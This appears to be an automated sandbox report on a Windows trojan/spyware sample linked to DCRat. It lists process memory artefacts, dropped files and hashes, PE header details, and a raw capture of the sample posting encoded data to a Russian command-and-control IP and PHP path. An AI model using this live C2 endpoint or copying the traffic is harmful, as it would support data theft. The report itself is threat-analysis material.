00000010.00000002.2969525932.0000000013B3A000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014285000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000143EE000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000138E8000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013A98000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013FB4000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013682000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000013.00000002.2897492105.000002338B200000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	jvwmcr3MsJ.16.dr, MP2aQfW2Vy.16.dr, cS9iz5zx2Z.16.dr, 5zHqOk5xO4.16.dr, WC2Xf6UDpM.16.dr, JGdF8sWVdZ.16.dr, c5bJEuKbRD.16.dr, Fl8JCpmmGb.16.dr, hX82OpooFo.16.dr	false		high
https://www.ecosia.org/newtab/	kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013BDC000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014069000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000144A2000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013A62000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000146BE000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014556000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000139F6000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013954000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014827000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014A59000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013B70000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013F00000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013BA6000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000141D1000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013B3A000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014285000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000143EE000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000138E8000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013A98000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013FB4000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013682000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	CnkpnRA30S.16.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.1842321653.000001C438447000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.3135016562.000000001FB62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013BDC000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014069000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000144A2000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013A62000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000146BE000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014556000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000139F6000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013954000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014827000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014A59000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013B70000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013F00000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013BA6000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000141D1000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013B3A000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014285000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000143EE000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000138E8000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013A98000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013FB4000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013682000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.3135016562.000000001FB62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.3135016562.000000001FB62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWind	kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2902556731.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2902556731.000000000336B000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.3135016562.000000001FB62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ion=v4.5	powershell.exe, 00000001.00000002.2674259117.0000018873300000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.1831369423.0000018800228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1839662361.00000216C3978000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1841383030.000001BC44498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1844407987.000001B3B7299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1842321653.000001C438447000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.3135016562.000000001FB62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.3135016562.000000001FB62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.1831369423.0000018800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1839662361.00000216C3751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1841383030.000001BC44271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1844407987.000001B3B7071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1842321653.000001C438221000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	CnkpnRA30S.16.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	jvwmcr3MsJ.16.dr, MP2aQfW2Vy.16.dr, cS9iz5zx2Z.16.dr, 5zHqOk5xO4.16.dr, WC2Xf6UDpM.16.dr, JGdF8sWVdZ.16.dr, c5bJEuKbRD.16.dr, Fl8JCpmmGb.16.dr, hX82OpooFo.16.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013BDC000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014069000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000144A2000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013A62000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000146BE000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014556000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000139F6000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013954000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014827000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014A59000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013B70000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013F00000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013BA6000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000141D1000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013B3A000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000014285000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000143EE000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.00000000138E8000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013A98000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013FB4000.00000004.00000800.00020000.00000000.sdmp, kOfFkekrfoWUJKTEEHXqPfq.exe, 00000010.00000002.2969525932.0000000013682000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
86.110.194.28	unknown	Russian Federation		208861	RACKTECHRU	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583843
Start date and time:	2025-01-03 18:26:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lEwK4xROgV.exe renamed because original name is a hash value
Original Sample Name:	6275c7746a9ce8e5e2fc05271e47bac9.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@27/375@0/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 23.56.254.164, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3716 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3940 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6824 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6852 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: lEwK4xROgV.exe

Simulations

Behavior and APIs

Time	Type	Description
12:27:01	API Interceptor	163x Sleep call for process: powershell.exe modified
12:27:16	API Interceptor	221508x Sleep call for process: kOfFkekrfoWUJKTEEHXqPfq.exe modified
12:27:17	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
86.110.194.28	zZ1Y43bxxV.exe	Get hash	malicious	DCRat	Browse	86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php
86.110.194.28	updIMdPUj8.exe	Get hash	malicious	DCRat	Browse	86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RACKTECHRU	zZ1Y43bxxV.exe	Get hash	malicious	DCRat	Browse	86.110.194.28
	updIMdPUj8.exe	Get hash	malicious	DCRat	Browse	86.110.194.28
	jew.sh4.elf	Get hash	malicious	Unknown	Browse	91.223.144.119
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	193.38.236.134
	oyCvLcfl3R.exe	Get hash	malicious	XenoRAT	Browse	194.113.106.81
	qsKo.ps1	Get hash	malicious	RHADAMANTHYS	Browse	194.113.106.180
	GsrDwm0DJG.ps1	Get hash	malicious	RHADAMANTHYS	Browse	194.113.106.180
	HeggBkMoYE.ps1	Get hash	malicious	RHADAMANTHYS	Browse	194.113.106.180
	b2J6hgvd51.elf	Get hash	malicious	Unknown	Browse	45.128.232.191
	TbFoReHi2v.elf	Get hash	malicious	Mirai	Browse	45.128.232.235

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\AGJFDLPU.log	zZ1Y43bxxV.exe	Get hash	malicious	DCRat	Browse
	VqGD18ELBM.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	updIMdPUj8.exe	Get hash	malicious	DCRat	Browse
	f3I38kv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	r6cRyCpdfS.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Z4D3XAZ2jB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	cbCjTbodwa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	vb8DOBZQ4X.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	XNPOazHpXF.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	9FwQYJSj4N.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Process:	C:\Users\user\Desktop\lEwK4xROgV.exe
File Type:	ASCII text, with very long lines (629), with no line terminators
Category:	dropped
Size (bytes):	629
Entropy (8bit):	5.856305232680563
Encrypted:	false
SSDEEP:	12:jE1l4XQ1oGzQ5cndXM+GabqpDVN7PNgj8cm:IY+dXNGabqLNzNZ
MD5:	EB8C981F0B28D60F59C5A632747C5A4E
SHA1:	0683F05C4AA6CCA5F8739630113F685290A643FC
SHA-256:	EC2B1D368207E836BF760E0A7D0EFF3A8A43AD52973739910E8566DEFF43A0FE
SHA-512:	A0DB2E673F6ABF1A3772F6006D4CFA72828147E27DCBBFA8EF8AF34F58CEAE737ADB960F059B1BFB92B90F07323B66402416C22559035BFEC03AD37216F8533F
Malicious:	false
Preview:	Ch3NELg0KpwtaNKis9wFQLkTRZmPJUkPhdw8Tz8nLvOqYrF13pjeHcW17j6piRqzFhM6bLO3AI3f635jTvVdvFHEH4Au2SE4EZl0fIasbqd8i15EoWVx6NE9ZHygKeArD9agSEELVnCFmIgQ96Fg7R80UlaXT3h6pv4jaYvkSKbTK9XRligNZeuwAjMqnr1bFGZ0N6zlLfNx0pqVOJvuXUhLAIi0MF6kSANEjgDot5C3Q76V31bd5GEujOzFY9YFime0blvsGGBbRn4DMM6UndoL5dfVr8Qug6VndG4RFtXzFnd5Tw2LCEbF7S48GZBI0R4URRkGSpO4FzGS9jC4FErcfQpKL5LpsP8xsInCMw2Xzh9ILl8gXGCvjczBlZ5WdjL00Tk169sTLUn7Rh9j7oRmMNNQSmaw0g3QWIR1BGkXXtjPy2uEZVZzRjnnGUjTj5cpaXkIPHi0D3Odo7ba1VXfGE9xfovrhQybQ3ybRmzRxivXUK9I3JbOi6jWXxmlV0TwFxMuJ9IPgFshSlcVpnyYzj3TUbDd9N56P9Rh7O93ALscOBEvUR6sC47g32ar5oQSJwSTU5Xao4Xn1aFSWRIrRN3UBvnExR8V5ZTctvbZ4fEIhUodx

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073497955654516
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr5:KooCEYhgYEL0In
MD5:	BFAB39E2ECE06A43539BDDEA7B30B533
SHA1:	52463579FE571C86C1410C6F3D6A0F506E4F5133
SHA-256:	700A1B328E0EA5E76CB5EF93F7E9D39BA9B683302D29DCBBD552EAB884B7411D
SHA-512:	DADAFC94AAD41EF8B36E52090FDD8D0E7727DB09E2F3BB83442ADEEF86E149D94189D497E7F1BEF88965176155EC7B9A5286513DD1632066BFD3A10532C71865
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Preview:	@...e.................................&..............@..........

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.613865166769504
Encrypted:	false
SSDEEP:	12:PJ5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:rdUOAokItULVDv
MD5:	B29E20FB139650556924373E12A38242
SHA1:	02E7FE0ED025E675CB7612583FE4C2B1ADB98045
SHA-256:	16C9F20409BBC0FA839FA78427280EA00317033E22353762DF1DD6B9F66B46F2
SHA-512:	D40449ACB37663F478CFFCDFB6E74C0797C210792A3EF23822D64D56A1BADF5AFAE52C5B6408D1770CAE4F31EC0BCD15A67F1648A202F65D5C0C9223EA3E9519
Malicious:	false
Preview:	..Pinging 910646 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.30342031524926
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	lEwK4xROgV.exe
File size:	3'966'976 bytes
MD5:	6275c7746a9ce8e5e2fc05271e47bac9
SHA1:	6e602c5d626aedcc9006c18b5dcb4285265501f0
SHA256:	a289b8be605d9a1d0b7d4f30290a2ce798aa6b70e2a7440fec0e07625b50fd73
SHA512:	a2a40afa60a73bbffcca2ce7fd53673e60a26d035fb82fbde995b0434b473ea4cc6da3edf158f943154ea869bf7f2448421ae3948038bafbc9e12e619660747e
SSDEEP:	49152:eqoEZMtkhYeVS/DqvypgwR9uVd7TfeBtF+99CutuvTC82K:eqoyMtkCeVSreqgwRmleBtF+7Cutuvv
TLSH:	D4068D03A1925FB2C3552F33C5DB99045364D3BC3123EA1BB96B0B531A5A396EB473A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................<.........N.<.. ....<...@.. ........................<...........@................................

Entrypoint:	0x7c9e4e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c9e00	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3ca000	0x370	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3cc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x3c7e54	0x3c8000	507e31409e44f5d81e962552818c9e06	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x3ca000	0x370	0x400	5e39513b2ebd2d0214da45a698e24317	False	0.3779296875	data	2.865400005536527	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x3cc000	0xc	0x200	3e9d883f762224f3c078b27198d512ff	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 18:27:41.339467049 CET	53	63572	162.159.36.2	192.168.2.4
Jan 3, 2025 18:27:41.858127117 CET	53	49642	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:15.545841932 CET	339	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:15.894135952 CET	344	OUT	Data Raw: 05 06 04 04 06 01 04 07 05 06 02 01 02 00 01 05 00 01 05 0e 02 06 03 0a 01 07 0e 03 03 0e 02 01 0f 53 03 0f 03 54 07 0b 0d 04 05 51 00 04 04 06 06 06 0d 01 0d 54 07 00 06 00 04 0d 05 0a 05 0e 00 05 0c 09 07 55 06 52 0f 57 0b 0e 0e 04 0c 52 06 06 Data Ascii: STQTURWRPRS\L}R`T`\r\vuZB~\|S`RhLhMlDoUzpa^knttg^i_~V@{S~}\y
Jan 3, 2025 18:27:16.249403954 CET	25	IN	HTTP/1.1 100 Continue
